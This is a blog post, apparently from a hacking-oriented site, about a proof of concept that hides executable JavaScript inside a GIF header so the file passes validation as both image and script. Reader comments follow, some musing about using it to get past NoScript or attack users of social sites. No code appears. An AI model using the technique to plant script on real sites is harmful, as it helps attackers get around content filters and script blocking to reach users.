Hiding Executable Javascript in Images That Pass Validation

Here’s an interesting proof-of-concept that could be useful or hazardous depending on the situation in which you encounter it. [jklmnn] drew inspiration from the work of [Ange Albertini] who has documented a way to hide Javascript within the header of a .gif file. Not only does it carry the complete code but both image and the Javascript are seen as valid.

With just a little bit of work [jklmnn] boiled down the concept to the most basic parts so that it is easy to understand. Next, a quick program was written to automate the embedding of the Javascript. Grab the source code if you want to give it a try yourself.

Let’s get back to how this might be useful rather than harmful. What if you are working on a computer that doesn’t allow the browser to load Javascript. You may be able to embed something useful, kind of like the hack that allowed movies to be played by abusing Microsoft Excel.

18 thoughts on “Hiding Executable Javascript in Images That Pass Validation

    1. I bet you people on this site who actually use NoScript add an exception for a few sites, upload this “image” , find some way to get it to run and NoScript treats it as running from the site itself.

          1. Well that should be the responsibility of the browser but since many downloads or similar provide wrong mime types they weakened that and Chrome for example only shows a warning in the console if a wrong mime type is provided.

  1. Funny how the linked site doesn’t work unless you enable scripting..

    Anyway maybe this works on facebook pages for turkish or syrian hackers to hack people. Or other popular sites/systems where people can make their own pages but the scripting is deliberately crippled.

    1. I excuse for that, though I’m not good at design so i took a bootstrap template and adapted it for my needs. I made another side completely using php and working without javascript but it doesn’t really look good.
      Javascript is a good technique for doing things locally (e.g. checking if the email input field contains an @ without needing to reload the side). But it has to be used carefully and safe.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s